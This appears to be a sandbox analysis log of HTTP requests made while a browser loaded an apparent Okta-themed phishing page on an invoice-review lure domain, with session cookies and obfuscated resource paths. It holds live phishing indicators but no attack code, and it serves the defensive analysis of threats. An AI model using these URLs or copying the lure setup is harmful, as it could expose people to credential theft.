XSRF-TOKEN=eyJpdiI6InJXNndRd002K3VhMVhjSnR1UGM4SVE9PSIsInZhbHVlIjoicEJvMUVHTDRNdmRTTDFQN1JidTBIZ1UzL2dTVFhjck9sdjAwQ3FwQmN3dk52ODdpU0dmNHc1ME9tVTI4K0FjbDl0TklYWGdwWjFkdXhBT1Z1SlBEbTRPNDhnaTdDdWh1MDRJdVJ1NUxyRGFiYUlCWU9BNWxqcG9nTG9KdTlGdDQiLCJtYWMiOiJmMjkzNTJjY2ZiNWU4ZTZhYWFhZjJmOTgzZTI2NWFhMTI4NjljYjVhM2FlM2Q0ZDIwNmYzNzliYzRjOGNlMGJlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IklqNjk1MDNodi9jVkZ0a1FzbWFOY1E9PSIsInZhbHVlIjoiRXltaDJBY2FhRUxlUmt5TExNeTFkMjZHd0U1Tzc1ZWd4Z2xXWDkzVjRHVjdFMHBmckJFa0c0UFBkYVBpYkJ5TEpBRnQvVmdrNDhMUjlON3BOMldjUEtmVVY5M2k4Qk5BZUdGZFN0K1EycUZnYi82d0lvUTErS0thdnA0UlcwZGEiLCJtYWMiOiIwODBkODE4MGQ1ZDYyZjlkZTFjNWE1ZmEzYTI5MTQ2YjE0MzllZDNlZGI3YzYzZWY2MjJjOGYxZjMyZDk2YmQwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff2 HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-aliveOrigin: https://2025_notificationx1invoice_review.fmhjhctk.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InJXNndRd002K3VhMVhjSnR1UGM4SVE9PSIsInZhbHVlIjoicEJvMUVHTDRNdmRTTDFQN1JidTBIZ1UzL2dTVFhjck9sdjAwQ3FwQmN3dk52ODdpU0dmNHc1ME9tVTI4K0FjbDl0TklYWGdwWjFkdXhBT1Z1SlBEbTRPNDhnaTdDdWh1MDRJdVJ1NUxyRGFiYUlCWU9BNWxqcG9nTG9KdTlGdDQiLCJtYWMiOiJmMjkzNTJjY2ZiNWU4ZTZhYWFhZjJmOTgzZTI2NWFhMTI4NjljYjVhM2FlM2Q0ZDIwNmYzNzliYzRjOGNlMGJlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IklqNjk1MDNodi9jVkZ0a1FzbWFOY1E9PSIsInZhbHVlIjoiRXltaDJBY2FhRUxlUmt5TExNeTFkMjZHd0U1Tzc1ZWd4Z2xXWDkzVjRHVjdFMHBmckJFa0c0UFBkYVBpYkJ5TEpBRnQvVmdrNDhMUjlON3BOMldjUEtmVVY5M2k4Qk5BZUdGZFN0K1EycUZnYi82d0lvUTErS0thdnA0UlcwZGEiLCJtYWMiOiIwODBkODE4MGQ1ZDYyZjlkZTFjNWE1ZmEzYTI5MTQ2YjE0MzllZDNlZGI3YzYzZWY2MjJjOGYxZjMyZDk2YmQwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-aliveOrigin: https://2025_notificationx1invoice_review.fmhjhctk.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InJXNndRd002K3VhMVhjSnR1UGM4SVE9PSIsInZhbHVlIjoicEJvMUVHTDRNdmRTTDFQN1JidTBIZ1UzL2dTVFhjck9sdjAwQ3FwQmN3dk52ODdpU0dmNHc1ME9tVTI4K0FjbDl0TklYWGdwWjFkdXhBT1Z1SlBEbTRPNDhnaTdDdWh1MDRJdVJ1NUxyRGFiYUlCWU9BNWxqcG9nTG9KdTlGdDQiLCJtYWMiOiJmMjkzNTJjY2ZiNWU4ZTZhYWFhZjJmOTgzZTI2NWFhMTI4NjljYjVhM2FlM2Q0ZDIwNmYzNzliYzRjOGNlMGJlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IklqNjk1MDNodi9jVkZ0a1FzbWFOY1E9PSIsInZhbHVlIjoiRXltaDJBY2FhRUxlUmt5TExNeTFkMjZHd0U1Tzc1ZWd4Z2xXWDkzVjRHVjdFMHBmckJFa0c0UFBkYVBpYkJ5TEpBRnQvVmdrNDhMUjlON3BOMldjUEtmVVY5M2k4Qk5BZUdGZFN0K1EycUZnYi82d0lvUTErS0thdnA0UlcwZGEiLCJtYWMiOiIwODBkODE4MGQ1ZDYyZjlkZTFjNWE1ZmEzYTI5MTQ2YjE0MzllZDNlZGI3YzYzZWY2MjJjOGYxZjMyZDk2YmQwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /GDSherpa-vf.woff2 HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-aliveOrigin: https://2025_notificationx1invoice_review.fmhjhctk.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InJXNndRd002K3VhMVhjSnR1UGM4SVE9PSIsInZhbHVlIjoicEJvMUVHTDRNdmRTTDFQN1JidTBIZ1UzL2dTVFhjck9sdjAwQ3FwQmN3dk52ODdpU0dmNHc1ME9tVTI4K0FjbDl0TklYWGdwWjFkdXhBT1Z1SlBEbTRPNDhnaTdDdWh1MDRJdVJ1NUxyRGFiYUlCWU9BNWxqcG9nTG9KdTlGdDQiLCJtYWMiOiJmMjkzNTJjY2ZiNWU4ZTZhYWFhZjJmOTgzZTI2NWFhMTI4NjljYjVhM2FlM2Q0ZDIwNmYzNzliYzRjOGNlMGJlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IklqNjk1MDNodi9jVkZ0a1FzbWFOY1E9PSIsInZhbHVlIjoiRXltaDJBY2FhRUxlUmt5TExNeTFkMjZHd0U1Tzc1ZWd4Z2xXWDkzVjRHVjdFMHBmckJFa0c0UFBkYVBpYkJ5TEpBRnQvVmdrNDhMUjlON3BOMldjUEtmVVY5M2k4Qk5BZUdGZFN0K1EycUZnYi82d0lvUTErS0thdnA0UlcwZGEiLCJtYWMiOiIwODBkODE4MGQ1ZDYyZjlkZTFjNWE1ZmEzYTI5MTQ2YjE0MzllZDNlZGI3YzYzZWY2MjJjOGYxZjMyZDk2YmQwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250317%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250317T205513Z&X-Amz-Expires=300&X-Amz-Signature=e616e7388ad102e9cb0d3ae02f97cd7c71b53bb553c2889c097375ffd2fede86&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /GDSherpa-vf2.woff2 HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-aliveOrigin: https://2025_notificationx1invoice_review.fmhjhctk.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InJXNndRd002K3VhMVhjSnR1UGM4SVE9PSIsInZhbHVlIjoicEJvMUVHTDRNdmRTTDFQN1JidTBIZ1UzL2dTVFhjck9sdjAwQ3FwQmN3dk52ODdpU0dmNHc1ME9tVTI4K0FjbDl0TklYWGdwWjFkdXhBT1Z1SlBEbTRPNDhnaTdDdWh1MDRJdVJ1NUxyRGFiYUlCWU9BNWxqcG9nTG9KdTlGdDQiLCJtYWMiOiJmMjkzNTJjY2ZiNWU4ZTZhYWFhZjJmOTgzZTI2NWFhMTI4NjljYjVhM2FlM2Q0ZDIwNmYzNzliYzRjOGNlMGJlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IklqNjk1MDNodi9jVkZ0a1FzbWFOY1E9PSIsInZhbHVlIjoiRXltaDJBY2FhRUxlUmt5TExNeTFkMjZHd0U1Tzc1ZWd4Z2xXWDkzVjRHVjdFMHBmckJFa0c0UFBkYVBpYkJ5TEpBRnQvVmdrNDhMUjlON3BOMldjUEtmVVY5M2k4Qk5BZUdGZFN0K1EycUZnYi82d0lvUTErS0thdnA0UlcwZGEiLCJtYWMiOiIwODBkODE4MGQ1ZDYyZjlkZTFjNWE1ZmEzYTI5MTQ2YjE0MzllZDNlZGI3YzYzZWY2MjJjOGYxZjMyZDk2YmQwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /34WyyfLCF60WyWJTghhC89MW03f9FF67110 HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InJXNndRd002K3VhMVhjSnR1UGM4SVE9PSIsInZhbHVlIjoicEJvMUVHTDRNdmRTTDFQN1JidTBIZ1UzL2dTVFhjck9sdjAwQ3FwQmN3dk52ODdpU0dmNHc1ME9tVTI4K0FjbDl0TklYWGdwWjFkdXhBT1Z1SlBEbTRPNDhnaTdDdWh1MDRJdVJ1NUxyRGFiYUlCWU9BNWxqcG9nTG9KdTlGdDQiLCJtYWMiOiJmMjkzNTJjY2ZiNWU4ZTZhYWFhZjJmOTgzZTI2NWFhMTI4NjljYjVhM2FlM2Q0ZDIwNmYzNzliYzRjOGNlMGJlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IklqNjk1MDNodi9jVkZ0a1FzbWFOY1E9PSIsInZhbHVlIjoiRXltaDJBY2FhRUxlUmt5TExNeTFkMjZHd0U1Tzc1ZWd4Z2xXWDkzVjRHVjdFMHBmckJFa0c0UFBkYVBpYkJ5TEpBRnQvVmdrNDhMUjlON3BOMldjUEtmVVY5M2k4Qk5BZUdGZFN0K1EycUZnYi82d0lvUTErS0thdnA0UlcwZGEiLCJtYWMiOiIwODBkODE4MGQ1ZDYyZjlkZTFjNWE1ZmEzYTI5MTQ2YjE0MzllZDNlZGI3YzYzZWY2MjJjOGYxZjMyZDk2YmQwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /klQ2Of4c6LA3qOVx1jLq0IKv1BfNb563yNbAtqnsmiChZNDrOoVJ0r9kvS36F5wx211 HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InJXNndRd002K3VhMVhjSnR1UGM4SVE9PSIsInZhbHVlIjoicEJvMUVHTDRNdmRTTDFQN1JidTBIZ1UzL2dTVFhjck9sdjAwQ3FwQmN3dk52ODdpU0dmNHc1ME9tVTI4K0FjbDl0TklYWGdwWjFkdXhBT1Z1SlBEbTRPNDhnaTdDdWh1MDRJdVJ1NUxyRGFiYUlCWU9BNWxqcG9nTG9KdTlGdDQiLCJtYWMiOiJmMjkzNTJjY2ZiNWU4ZTZhYWFhZjJmOTgzZTI2NWFhMTI4NjljYjVhM2FlM2Q0ZDIwNmYzNzliYzRjOGNlMGJlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IklqNjk1MDNodi9jVkZ0a1FzbWFOY1E9PSIsInZhbHVlIjoiRXltaDJBY2FhRUxlUmt5TExNeTFkMjZHd0U1Tzc1ZWd4Z2xXWDkzVjRHVjdFMHBmckJFa0c0UFBkYVBpYkJ5TEpBRnQvVmdrNDhMUjlON3BOMldjUEtmVVY5M2k4Qk5BZUdGZFN0K1EycUZnYi82d0lvUTErS0thdnA0UlcwZGEiLCJtYWMiOiIwODBkODE4MGQ1ZDYyZjlkZTFjNWE1ZmEzYTI5MTQ2YjE0MzllZDNlZGI3YzYzZWY2MjJjOGYxZjMyZDk2YmQwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /ijSWB6XDt2x23vPWFuGmlisfdPo0Mn2Fqr4oBXq1n5NrfcM46mk9Zmyz230 HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InJXNndRd002K3VhMVhjSnR1UGM4SVE9PSIsInZhbHVlIjoicEJvMUVHTDRNdmRTTDFQN1JidTBIZ1UzL2dTVFhjck9sdjAwQ3FwQmN3dk52ODdpU0dmNHc1ME9tVTI4K0FjbDl0TklYWGdwWjFkdXhBT1Z1SlBEbTRPNDhnaTdDdWh1MDRJdVJ1NUxyRGFiYUlCWU9BNWxqcG9nTG9KdTlGdDQiLCJtYWMiOiJmMjkzNTJjY2ZiNWU4ZTZhYWFhZjJmOTgzZTI2NWFhMTI4NjljYjVhM2FlM2Q0ZDIwNmYzNzliYzRjOGNlMGJlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IklqNjk1MDNodi9jVkZ0a1FzbWFOY1E9PSIsInZhbHVlIjoiRXltaDJBY2FhRUxlUmt5TExNeTFkMjZHd0U1Tzc1ZWd4Z2xXWDkzVjRHVjdFMHBmckJFa0c0UFBkYVBpYkJ5TEpBRnQvVmdrNDhMUjlON3BOMldjUEtmVVY5M2k4Qk5BZUdGZFN0K1EycUZnYi82d0lvUTErS0thdnA0UlcwZGEiLCJtYWMiOiIwODBkODE4MGQ1ZDYyZjlkZTFjNWE1ZmEzYTI5MTQ2YjE0MzllZDNlZGI3YzYzZWY2MjJjOGYxZjMyZDk2YmQwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /uveXL7lccWo3VQL1AQNrNkqrY0gg6oIq92t2l012130 HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InJXNndRd002K3VhMVhjSnR1UGM4SVE9PSIsInZhbHVlIjoicEJvMUVHTDRNdmRTTDFQN1JidTBIZ1UzL2dTVFhjck9sdjAwQ3FwQmN3dk52ODdpU0dmNHc1ME9tVTI4K0FjbDl0TklYWGdwWjFkdXhBT1Z1SlBEbTRPNDhnaTdDdWh1MDRJdVJ1NUxyRGFiYUlCWU9BNWxqcG9nTG9KdTlGdDQiLCJtYWMiOiJmMjkzNTJjY2ZiNWU4ZTZhYWFhZjJmOTgzZTI2NWFhMTI4NjljYjVhM2FlM2Q0ZDIwNmYzNzliYzRjOGNlMGJlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IklqNjk1MDNodi9jVkZ0a1FzbWFOY1E9PSIsInZhbHVlIjoiRXltaDJBY2FhRUxlUmt5TExNeTFkMjZHd0U1Tzc1ZWd4Z2xXWDkzVjRHVjdFMHBmckJFa0c0UFBkYVBpYkJ5TEpBRnQvVmdrNDhMUjlON3BOMldjUEtmVVY5M2k4Qk5BZUdGZFN0K1EycUZnYi82d0lvUTErS0thdnA0UlcwZGEiLCJtYWMiOiIwODBkODE4MGQ1ZDYyZjlkZTFjNWE1ZmEzYTI5MTQ2YjE0MzllZDNlZGI3YzYzZWY2MjJjOGYxZjMyZDk2YmQwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /oppCC2yff12YyfUIa0hvdyqmnO1npn8eKKiH67140 HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InJXNndRd002K3VhMVhjSnR1UGM4SVE9PSIsInZhbHVlIjoicEJvMUVHTDRNdmRTTDFQN1JidTBIZ1UzL2dTVFhjck9sdjAwQ3FwQmN3dk52ODdpU0dmNHc1ME9tVTI4K0FjbDl0TklYWGdwWjFkdXhBT1Z1SlBEbTRPNDhnaTdDdWh1MDRJdVJ1NUxyRGFiYUlCWU9BNWxqcG9nTG9KdTlGdDQiLCJtYWMiOiJmMjkzNTJjY2ZiNWU4ZTZhYWFhZjJmOTgzZTI2NWFhMTI4NjljYjVhM2FlM2Q0ZDIwNmYzNzliYzRjOGNlMGJlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IklqNjk1MDNodi9jVkZ0a1FzbWFOY1E9PSIsInZhbHVlIjoiRXltaDJBY2FhRUxlUmt5TExNeTFkMjZHd0U1Tzc1ZWd4Z2xXWDkzVjRHVjdFMHBmckJFa0c0UFBkYVBpYkJ5TEpBRnQvVmdrNDhMUjlON3BOMldjUEtmVVY5M2k4Qk5BZUdGZFN0K1EycUZnYi82d0lvUTErS0thdnA0UlcwZGEiLCJtYWMiOiIwODBkODE4MGQ1ZDYyZjlkZTFjNWE1ZmEzYTI5MTQ2YjE0MzllZDNlZGI3YzYzZWY2MjJjOGYxZjMyZDk2YmQwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /klQ2Of4c6LA3qOVx1jLq0IKv1BfNb563yNbAtqnsmiChZNDrOoVJ0r9kvS36F5wx211 HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InJXNndRd002K3VhMVhjSnR1UGM4SVE9PSIsInZhbHVlIjoicEJvMUVHTDRNdmRTTDFQN1JidTBIZ1UzL2dTVFhjck9sdjAwQ3FwQmN3dk52ODdpU0dmNHc1ME9tVTI4K0FjbDl0TklYWGdwWjFkdXhBT1Z1SlBEbTRPNDhnaTdDdWh1MDRJdVJ1NUxyRGFiYUlCWU9BNWxqcG9nTG9KdTlGdDQiLCJtYWMiOiJmMjkzNTJjY2ZiNWU4ZTZhYWFhZjJmOTgzZTI2NWFhMTI4NjljYjVhM2FlM2Q0ZDIwNmYzNzliYzRjOGNlMGJlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IklqNjk1MDNodi9jVkZ0a1FzbWFOY1E9PSIsInZhbHVlIjoiRXltaDJBY2FhRUxlUmt5TExNeTFkMjZHd0U1Tzc1ZWd4Z2xXWDkzVjRHVjdFMHBmckJFa0c0UFBkYVBpYkJ5TEpBRnQvVmdrNDhMUjlON3BOMldjUEtmVVY5M2k4Qk5BZUdGZFN0K1EycUZnYi82d0lvUTErS0thdnA0UlcwZGEiLCJtYWMiOiIwODBkODE4MGQ1ZDYyZjlkZTFjNWE1ZmEzYTI5MTQ2YjE0MzllZDNlZGI3YzYzZWY2MjJjOGYxZjMyZDk2YmQwIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /qxQ4HAEDWuhosbVQ1dW6HqvLQzGIwgJj7Hg4HAJk0Df36BLVjCV9Mhx HTTP/1.1Host: 2025_notificationx1invoice_review.fmhjhctk.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlBoRE8zQlpmVnVqS0FESU9NVGhsbUE9PSIsInZhbHVlIjoiUmplcmZtWXY2Z1pJWjBhWGZLenJ3czdvZGRaaFJQbkNRdFlpVURrOEZrYXZOUnRkbDd2bmVtMzN3MnFxd2dvcjJ4OTdkbUxSNGgzZVpDZG1ZSkU2WVp6RzZ3SWdqSE1mQlZJV3pZT3B2NHpoSHJ3ZU9JZzFBamJaM0ZjZFByaUciLCJtYWMiOiI5YjkyZGViODVhZGMyMzExMGM5MjM3ODdjZTc5YjM3MTY4ZmI5MWUzYjBjOWVlNzkzYjA3MjQ2YmYwNzA2NTFjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkcvTmZoU0sxVHBoSzJkdC9LR1R2cXc9PSIsInZhbHVlIjoiYXkzVlJPbHVLSkZBVVlObnRqMXFvNlRWM0FTYXM5NS9tRWRxOTJicS9mNmtCMXVkeU4zWjJoTVFjY0xSU3FTRDgrWHRLaFVZTVNKZHJ5V2dWQmRsV0dKTmNheG8rSzZROFgwVkRod1ZtQnhJdjRxUS9Ta3hnUGl6dU11VSsrWGMiLCJtYWMiOiI3NTczMjFiNDljYTQ1NjQ3NDU4Yjc5Mjc3ZDIyMjRmMGFiOTk1YTYxNjM4Y2E4MzFiYmIxNzkwNTJhNTRhODEwIiwidGFnIjoiIn0%3D
